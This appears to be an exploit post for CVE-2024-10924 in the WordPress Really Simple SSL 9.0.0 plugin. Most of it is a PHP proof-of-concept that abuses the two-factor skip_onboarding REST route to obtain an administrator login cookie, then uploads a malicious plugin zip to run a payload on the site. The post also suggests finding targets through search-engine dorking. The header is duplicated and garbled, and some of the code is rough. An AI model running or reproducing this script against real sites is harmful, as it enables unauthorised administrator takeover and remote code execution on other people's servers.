WordPress Really Simple SSL 9.0.0 Authentication Bypass

=============================================================================================================================================
| # Title : WordPress Really =============================================================================================================================================
| # Title : WordPress Really Simple SSL plugin v9.0.0 PHP Back Connect |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://wordpress.org/plugins/really-simple-ssl/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: Bypass 2FA in WordPress and upload and launch Payload. Code supports all operating systems

(Related : https://packetstorm.news/files/id/183035/ Related CVE numbers: CVE-2024-10924 ) .

[+] Payload :

[+] Set Target : line 59

[+] Usage : php poc.php

[+] PayLoad :


<?php

function check_wordpress_site($url) {
$headers = @get_headers($url);
if (!$headers || strpos($headers[0], '200') === false) {
return false;
}
return true;
}

function bypass_2fa($target, $user_id) {
$login_nonce = rand(1000000000, 9999999999);
$data = json_encode([
'user_id' => $user_id,
'login_nonce' => $login_nonce,
'redirect_to' => '/wp-admin/'
]);

$url = "$target?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$response = curl_exec($ch);
curl_close($ch);

if (!$response) {
return false;
}

preg_match('/(wordpress_logged_in_[a-f0-9]{32}=[^;]+)/', $response, $matches);
return $matches[1] ?? false;
}

function upload_payload($target, $admin_cookie, $plugin_name, $payload_name) {
$zip_path = "$plugin_name.zip";

$url = "$target/wp-admin/update.php?action=upload-plugin";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Cookie: ' . $admin_cookie,
'Content-Type: multipart/form-data'
]);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'pluginzip' => new CURLFile($zip_path),
'_wpnonce' => 'random_nonce',
'install-plugin-submit' => 'Install Now'
]);

$response = curl_exec($ch);
curl_close($ch);

return strpos($response, 'Plugin installed successfully') !== false;
}

$target = "http://target.com";
$user_id = 1;

if (!check_wordpress_site($target)) {
die("WordPress site is not online.\n");
}

$admin_cookie = bypass_2fa($target, $user_id);
if (!$admin_cookie) {
die("Failed to bypass 2FA.\n");
}

$plugin_name = "wp_" . substr(md5(mt_rand()), 0, 5);
$payload_name = "ajax_" . substr(md5(mt_rand()), 0, 5);

if (!upload_payload($target, $admin_cookie, $plugin_name, $payload_name)) {
die("Failed to upload payload.\n");
}

echo "Payload executed at $target/wp-content/plugins/$plugin_name/$payload_name.php\n";


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================